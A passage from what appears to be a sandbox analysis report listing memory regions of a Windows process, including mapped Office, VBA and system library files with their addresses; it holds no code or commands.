start_va = 0xfb60000 end_va = 0xff29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 514 start_va = 0xff30000 end_va = 0x102f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff30000" filename = "" Region: id = 515 start_va = 0xce50000 end_va = 0xd03afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = "" Region: id = 516 start_va = 0xfb60000 end_va = 0xfd48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 517 start_va = 0xce50000 end_va = 0xd11efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = "" Region: id = 518 start_va = 0xfb60000 end_va = 0xfe2dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 519 start_va = 0xfe30000 end_va = 0xff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe30000" filename = "" Region: id = 520 start_va = 0xce50000 end_va = 0xcfb6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = "" Region: id = 521 start_va = 0xfb60000 end_va = 0xff2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 522 start_va = 0xff30000 end_va = 0x10300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff30000" filename = "" Region: id = 523 start_va = 0x10310000 end_va = 0x104f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010310000" filename = "" Region: id = 524 start_va = 0xfb60000 end_va = 0xfd4afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 525 start_va = 0xfd50000 end_va = 0x10015fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd50000" filename = "" Region: id = 526 start_va = 0x10020000 end_va = 0x103ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010020000" filename = "" Region: id = 527 start_va = 0x103f0000 end_va = 0x107effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000103f0000" filename = "" Region: id = 528 start_va = 0xb470000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{4ec814fd-e405-48e0-b19f-cc2ea4ef52c4}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{4EC814FD-E405-48E0-B19F-CC2EA4EF52C4}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{4ec814fd-e405-48e0-b19f-cc2ea4ef52c4}.tmp") Region: id = 529 start_va = 0x681f0000 end_va = 0x6846efff monitored = 1 entry_point = 0x6828bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 530 start_va = 0x68130000 end_va = 0x681eefff monitored = 0 entry_point = 0x68141dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 531 start_va = 0xaf0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 532 start_va = 0xb00000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 533 start_va = 0xb00000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 534 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 535 start_va = 0xb00000 end_va = 0xb03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 536 start_va = 0xb10000 end_va = 0xb54fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 537 start_va = 0x80b0000 end_va = 0x80b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 538 start_va = 0xb4f0000 end_va = 0xb57dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 539 start_va = 0x80c0000 end_va = 0x80d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 540 start_va = 0x80e0000 end_va = 0x80e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080e0000" filename = "" Region: id = 541 start_va = 0x80f0000 end_va = 0x80f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080f0000" filename = "" Region: id = 542 start_va = 0x8100000 end_va = 0x8100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 543 start_va = 0xce50000 end_va = 0xcf36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 544 start_va = 0xcf40000 end_va = 0xd01cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrib.ttf" filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf") Region: id = 545 start_va = 0x107f0000 end_va = 0x109effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000107f0000" filename = "" Region: id = 546 start_va = 0x68010000 end_va = 0x6812bfff monitored = 0 entry_point = 0x680774f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 547 start_va = 0x67ff0000 end_va = 0x68008fff monitored = 0 entry_point = 0x67ff47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 548 start_va = 0x8100000 end_va = 0x8100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008100000" filename = "" Region: id = 549 start_va = 0x8110000 end_va = 0x811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008110000" filename = "" Region: id = 550 start_va = 0xd020000 end_va = 0xd11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d020000" filename = "" Region: id = 551 start_va = 0x109f0000 end_va = 0x10dacfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000109f0000" filename = "" Region: id = 552 start_va = 0x10db0000 end_va = 0x1116cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010db0000" filename = "" Region: id = 553 start_va = 0x8110000 end_va = 0x811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008110000" filename = "" Region: id = 554 start_va = 0x8270000 end_va = 0x827ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008270000" filename = "" Region: id = 555 start_va = 0x8280000 end_va = 0x828ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008280000" filename = "" Region: id = 556 start_va = 0x8280000 end_va = 0x828ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008280000" filename = "" Region: id = 557 start_va = 0xfb60000 end_va = 0xfbfdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 558 start_va = 0x8280000 end_va = 0x828ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008280000" filename = "" Region: id = 559 start_va = 0x8290000 end_va = 0x829ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008290000" filename = "" Region: id = 560 start_va = 0x82a0000 end_va = 0x82affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082a0000" filename = "" Region: id = 561 start_va = 0x82a0000 end_va = 0x82affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082a0000" filename = "" Region: id = 562 start_va = 0x82b0000 end_va = 0x82bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082b0000" filename = "" Region: id = 563 start_va = 0x82c0000 end_va = 0x82cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082c0000" filename = "" Region: id = 564 start_va = 0x76b50000 end_va = 0x76b54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 565 start_va = 0x82a0000 end_va = 0x82b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 566 start_va = 0x67fe0000 end_va = 0x67feafff monitored = 0 entry_point = 0x67fe2150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 567 start_va = 0x82c0000 end_va = 0x82c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082c0000" filename = "" Region: id = 568 start_va = 0x67f10000 end_va = 0x67fd8fff monitored = 0 entry_point = 0x67f23180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 569 start_va = 0x67ef0000 end_va = 0x67f0bfff monitored = 0 entry_point = 0x67ef4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 570 start_va = 0x82c0000 end_va = 0x82c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082c0000" filename = "" Region: id = 571 start_va = 0x67ee0000 end_va = 0x67eeefff monitored = 0 entry_point = 0x67ee3f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 572 start_va = 0x82d0000 end_va = 0x82d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082d0000" filename = "" Region: id = 573 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 574 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 575 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 576 start_va = 0x82d0000 end_va = 0x82d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082d0000" filename = "" Region: id = 577 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 578 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 579 start_va = 0x70670000 end_va = 0x706b0fff monitored = 0 entry_point = 0x70677fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 580 start_va = 0x82d0000 end_va = 0x82dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082d0000" filename = "" Region: id = 581 start_va = 0x695d0000 end_va = 0x69650fff monitored = 0 entry_point = 0x695eb260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 582 start_va = 0x9a40000 end_va = 0x9b20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msword.olb") Region: id = 583 start_va = 0x82d0000 end_va = 0x82d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 584 start_va = 0x695c0000 end_va = 0x695ccfff monitored = 0 entry_point = 0x695c3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 585 start_va = 0x69550000 end_va = 0x695b6fff monitored = 0 entry_point = 0x6956b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 586 start_va = 0x9b30000 end_va = 0x9d55fff monitored = 1 entry_point = 0x9b3e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 587 start_va = 0x69530000 end_va = 0x69540fff monitored = 0 entry_point = 0x69538fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 588 start_va = 0x692f0000 end_va = 0x69520fff monitored = 1 entry_point = 0x692fe058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 589 start_va = 0x9b30000 end_va = 0x9b31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009b30000" filename = "" Region: id = 590 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 591 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 592 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 593 start_va = 0x9b40000 end_va = 0x9b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b40000" filename = "" Region: id = 594 start_va = 0x69000000 end_va = 0x690befff monitored = 0 entry_point = 0x69031e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 595 start_va = 0x9b50000 end_va = 0x9b75fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 596 start_va = 0x9b80000 end_va = 0x9b8afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 597 start_va = 0x11170000 end_va = 0x11661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011170000" filename = "" Region: id = 598 start_va = 0x9b90000 end_va = 0x9b9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009b90000" filename = "" Region: id = 599 start_va = 0x9b90000 end_va = 0x9b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b90000" filename = "" Region: id = 600 start_va = 0x9ba0000 end_va = 0x9bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ba0000" filename = "" Region: id = 601 start_va = 0x9bc0000 end_va = 0x9bc2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 602 start_va = 0x9bd0000 end_va = 0x9bd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bd0000" filename = "" Region: id = 603 start_va = 0x9be0000 end_va = 0x9be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009be0000" filename = "" Region: id = 604 start_va = 0x9bf0000 end_va = 0x9bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bf0000" filename = "" Region: id = 605 start_va = 0x9c00000 end_va = 0x9c03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c00000" filename = "" Region: id = 606 start_va = 0x9c10000 end_va = 0x9c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c10000" filename = "" Region: id = 607 start_va = 0x9c30000 end_va = 0x9c32fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c30000" filename = "" Region: id = 608 start_va = 0x9c40000 end_va = 0x9c54fff monitored = 1 entry_point = 0x9cdbfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 609 start_va = 0x9c60000 end_va = 0x9c64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 610 start_va = 0x9c70000 end_va = 0x9cebfff monitored = 0 entry_point = 0x9c71000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 611 start_va = 0x9cf0000 end_va = 0x9cf3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009cf0000" filename = "" Region: id = 612 start_va = 0x9d00000 end_va = 0x9d03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d00000" filename = "" Region: id = 613 start_va = 0x9d10000 end_va = 0x9d12fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d10000" filename = "" Region: id = 614 start_va = 0x9d20000 end_va = 0x9d23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d20000" filename = "" Region: id = 615 start_va = 0x9d30000 end_va = 0x9d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d30000" filename = "" Region: id = 616 start_va = 0x9d50000 end_va = 0x9d52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d50000" filename = "" Region: id = 617 start_va = 0x9d60000 end_va = 0x9d65fff monitored = 1 entry_point = 0x9dfbfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 618 start_va = 0x9d70000 end_va = 0x9d73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d70000" filename = "" Region: id = 619 start_va = 0x9d70000 end_va = 0x9daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d70000" filename = "" Region: id = 620 start_va = 0x9db0000 end_va = 0x9eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009db0000" filename = "" Region: id = 621 start_va = 0x9eb0000 end_va = 0x9eb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009eb0000" filename = "" Region: id = 622 start_va = 0x9ec0000 end_va = 0x9ec3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ec0000" filename = "" Region: id = 623 start_va = 0x9ed0000 end_va = 0x9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ed0000" filename = "" Region: id = 624 start_va = 0xfc00000 end_va = 0xfcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 625 start_va = 0x11670000 end_va = 0x11938fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011670000" filename = "" Region: id = 626 start_va = 0x9f10000 end_va = 0x9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 627 start_va = 0x11940000 end_va = 0x11aacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011940000" filename = "" Region: id = 628 start_va = 0x70e70000 end_va = 0x70e82fff monitored = 0 entry_point = 0x70e79950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 629 start_va = 0x72bf0000 end_va = 0x72c1efff monitored = 0 entry_point = 0x72c095e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 630 start_va = 0x11ab0000 end_va = 0x11c1cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ab0000" filename = "" Region: id = 631 start_va = 0x11940000 end_va = 0x11aa4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011940000" filename = "" Region: id = 632 start_va = 0x11ab0000 end_va = 0x11c1afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ab0000" filename = "" Region: id = 633 start_va = 0x11940000 end_va = 0x11aa4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011940000" filename = "" Region: id = 634 start_va = 0x691a0000 end_va = 0x692edfff monitored = 0 entry_point = 0x691e3000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 635 start_va = 0x69170000 end_va = 0x69192fff monitored = 0 entry_point = 0x69177b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 636 start_va = 0x69150000 end_va = 0x69165fff monitored = 0 entry_point = 0x691521d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 637 start_va = 0x69120000 end_va = 0x6914afff monitored = 0 entry_point = 0x69129a70 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 638 start_va = 0x9f10000 end_va = 0x9f1cfff monitored = 0 entry_point = 0x9f17b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 639 start_va = 0x11670000 end_va = 0x1175bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011670000" filename = "" Region: id = 640 start_va = 0x11760000 end_va = 0x11844fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011760000" filename = "" Region: id = 641 start_va = 0x68c60000 end_va = 0x68ff0fff monitored = 0 entry_point = 0x68f135b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 642 start_va = 0x11ab0000 end_va = 0x11baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ab0000" filename = "" Region: id = 643 start_va = 0x9f10000 end_va = 0x9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 644 start_va = 0x9f20000 end_va = 0x9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 645 start_va = 0x9f30000 end_va = 0x9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 646 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 647 start_va = 0xb580000 end_va = 0xb58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 648 start_va = 0x11bb0000 end_va = 0x11caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 649 start_va = 0xb590000 end_va = 0xb59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b590000" filename = "" Region: id = 650 start_va = 0xb5a0000 end_va = 0xb5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5a0000" filename = "" Region: id = 651 start_va = 0xd120000 end_va = 0xd12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d120000" filename = "" Region: id = 652 start_va = 0xdd90000 end_va = 0xdd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd90000" filename = "" Region: id = 653 start_va = 0x11670000 end_va = 0x11708fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011670000" filename = "" Region: id = 654 start_va = 0xfd00000 end_va = 0xfd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd00000" filename = "" Region: id = 655 start_va = 0xfd10000 end_va = 0xfd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd10000" filename = "" Region: id = 656 start_va = 0xfd20000 end_va = 0xfd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd20000" filename = "" Region: id = 657 start_va = 0xfd30000 end_va = 0xfd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd30000" filename = "" Region: id = 658 start_va = 0xdd90000 end_va = 0xdd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd90000" filename = "" Region: id = 659 start_va = 0xfd00000 end_va = 0xfd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd00000" filename = "" Region: id = 660 start_va = 0xfd10000 end_va = 0xfd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd10000" filename = "" Region: id = 661 start_va = 0xfd20000 end_va = 0xfd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd20000" filename = "" Region: id = 662 start_va = 0xfd30000 end_va = 0xfd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd30000" filename = "" Region: id = 663 start_va = 0xfd40000 end_va = 0xfd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 664 start_va = 0xfd40000 end_va = 0xfd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 665 start_va = 0x11710000 end_va = 0x1171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011710000" filename = "" Region: id = 666 start_va = 0x11720000 end_va = 0x1172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011720000" filename = "" Region: id = 667 start_va = 0x11730000 end_va = 0x1173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011730000" filename = "" Region: id = 668 start_va = 0x11740000 end_va = 0x1174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011740000" filename = "" Region: id = 669 start_va = 0x11750000 end_va = 0x1175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011750000" filename = "" Region: id = 670 start_va = 0x11850000 end_va = 0x1185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 671 start_va = 0x11860000 end_va = 0x1186ffff 